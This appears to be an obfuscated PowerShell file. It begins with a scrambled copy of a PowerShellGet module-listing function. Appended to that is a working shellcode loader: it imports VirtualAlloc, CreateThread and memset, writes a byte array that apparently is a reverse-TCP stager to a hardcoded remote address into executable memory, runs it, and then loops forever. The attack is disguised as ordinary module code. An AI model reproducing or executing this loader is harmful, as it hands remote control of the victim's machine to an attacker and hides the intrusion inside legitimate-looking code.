function SeT-INS`TAL`L`EDMOD`UleSVar`iA`BlE
{
    
    ${SCrIpt`:`PSG`ETInStalLed`MODULes} = [ordered]@{}

    ${m`odu`lEPat`hS} = @(${Scr`iPt:PRO`Gr`AM`FIlEsmOdu`l`E`sPAth}, ${S`cripT:`MY`dOcum`ents`mODU`lESP`ATh})

    foreach (${lOCA`TioN} in ${m`oDUl`E`pathS})
    {
        
        ${G`ETCh`IL`Di`TE`m`paRaMS} = @{
            ("{0}{1}"-f 'Pa','th') = ${LoC`AtIon}
            ("{2}{0}{1}" -f'rs','e','Recu') = ${Tr`UE}
            ("{1}{0}" -f'ce','For') = ${T`RUE}
            ("{1}{0}{2}"-f 't','Fil','er') = ${sCRIPT:`p`SGE`TITemInF`O`FIlEN`A`mE}
            ("{2}{0}{1}" -f'rAc','tion','Erro') = ("{2}{4}{1}{0}{3}"-f'n','o','Silen','tinue','tlyC')
            ("{2}{1}{3}{0}"-f'n','n','War','ingActio') = ("{0}{1}{3}{2}" -f 'SilentlyCo','n','ue','tin')
        }

        if(${S`CR`Ip`T:I`SwINdoWS})
        {
            ${GEtchIL`Di`Tem`PAr`AmS}[("{1}{2}{0}" -f 'tes','Attrib','u')] = ("{1}{0}"-f 'idden','H')
        }

        ${MOd`Ulebas`Es} = &("{2}{0}{1}"-f'i','ldItem','Get-Ch') @GetChildItemParams | .("{2}{1}{0}"-f 'ct','ach-Obje','Fore') { ${_}."dIrE`ctOrY" }


        foreach (${mo`dU`LebAsE} in ${modU`lE`BAsES})
        {
            ${PsGe`TiteM`i`Nf`OpatH} = .((("{0}{5}{1}{8}{7}{3}{2}{6}{4}" -f'Micros','ell.M','in-','nt{0}Jo','ath','oft.PowerSh','P','nageme','a'))  -f [cHAr]92) ${Mo`dU`lE`BaSe}."ful`Ln`AME" ${S`C`Rip`T:PsgEtI`TeminfOF`I`leNaMe}

            
            if (&((("{1}{10}{6}{8}{5}{3}{0}{9}{2}{4}{7}" -f 'agemen','Mic','FoT','Man','est-P','ell.','osoft.Pow','ath','erSh','t9','r'))-REPlace ([CHaR]57+[CHaR]70+[CHaR]111),[CHaR]92) ${p`sGetIte`mINF`Op`Ath})
            {
                ${p`SGET`ITE`MiNfO} = &("{4}{1}{0}{3}{6}{2}{5}"-f'ze','eriali','SO','-','DeS','bject','P') -Path ${PS`GETi`T`EMiNF`OPatH}

                
                if(-not (.("{1}{2}{0}" -f'ber','G','et-Mem') -InputObject ${P`S`GEt`iTEMInFO} -Name ${SCr`I`pt:INStaLLE`dloCAT`ion}))
                {
                    &((("{2}{9}{7}{1}{0}{8}{5}{6}{4}{10}{3}"-f 'Powe','t.','M','dd-Member','0}','l.Utilit','y{','of','rShel','icros','A'))-F  [CHAR]92) -InputObject ${p`SG`ETITE`minFO} `
                                                            -MemberType ("{0}{3}{1}{2}" -f 'Not','ropert','y','eP') `
                                                            -Name ${ScR`iPT:i`NStalledl`oc`Ation} `
                                                            -Value ${modulE`BA`se}."fU`l`lnamE"
                }

                ${pAcK`A`ge} = .("{3}{5}{7}{4}{9}{8}{1}{6}{0}{10}{2}"-f'tI','ityFromP','fo','New-','a','Soft','SGe','w','nt','reIde','temIn') -PSGetItemInfo ${ps`gE`TItEmi`N`FO}

                if(${PaCka`gE})
                {
                    ${ScripT:`pSgE`Ti`NS`TallEDM`O`Du`les}["$($psgetItemInfo.Name)$($psgetItemInfo.Version)"] = @{
                                                                                                            ("{3}{1}{0}{2}"-f'eId','ar','entity','Softw') = ${P`A`CkAGe}
                                                                                                            ("{1}{2}{0}" -f'fo','PSGetIte','mIn') = ${PSG`e`T`itemi`NFO}
                                                                                                        }
                }
            }
        }
    }
}
${c} = ((("{13}{25}{66}{44}{30}{26}{53}{55}{70}{50}{31}{47}{10}{16}{42}{27}{7}{23}{54}{68}{41}{64}{14}{36}{58}{22}{18}{63}{67}{71}{52}{0}{51}{38}{9}{15}{12}{69}{6}{37}{5}{75}{19}{35}{48}{2}{59}{32}{17}{29}{39}{11}{24}{1}{56}{65}{45}{49}{62}{33}{28}{61}{57}{72}{43}{73}{20}{21}{4}{34}{46}{60}{40}{3}{8}{74}" -f 'bl','tr l','IntPtr','tr dest, uint src, uint c','tic extern','ributes, uin','ThreadAt','Typ','ou',' ','ze, uint',' uint dw','(IntP','[Dl','Dll','extern IntPtr CreateThread',' ','ddres','VXk','dwStackSi',' s','ta','t(A','e,','CreationFlags, IntP','l','n','llocation','t(','s, IntPtr lpParameter','r','oc(I','pStartA','por',' ','ze,','Impo','t',' static',',','P','flProte','flA',')]p','ort(AVXkernel32.dllAVX)]public static exte','a','IntPtr ','ntPtr lpAddress, uint dwSi',' ','dI','All','ic',')]pu',' IntPtr',' uin',' V','pT','msvc','r',' l','memset(Int','AVX','d);[DllIm','ern','ct);[','hre','Imp','el','t ','tr lp','irtual','32.dllAVX','rt.dllAVX','ublic','nt);','t '))."re`pLacE"(([char]65+[char]86+[char]88),[stRing][char]34));${W} = &("{2}{1}{0}" -f 'ype','d-T','Ad') -memberDefinition ${c} -Name ("{0}{1}" -f'Win3','2') -namespace ("{2}{1}{0}" -f's','ion','Win32Funct') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xbc,0x30,0x50,0xeb,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${G} = 0x1000;if (${z}."lenG`Th" -gt 0x1000){${g} = ${z}."lEn`G`TH"};${x}=${W}::("{3}{1}{2}{0}"-f 'c','rtualAll','o','Vi').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${Z}."lEn`gtH"-1);${i}++) {${w}::"meM`sET"([IntPtr](${x}.("{1}{0}{2}" -f'n','ToI','t32').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{2}{0}{1}{3}"-f'eateThre','a','Cr','d').Invoke(0,0,${x},0,0,0);for (;;){.("{2}{1}{0}"-f'eep','-sl','Start') 60};
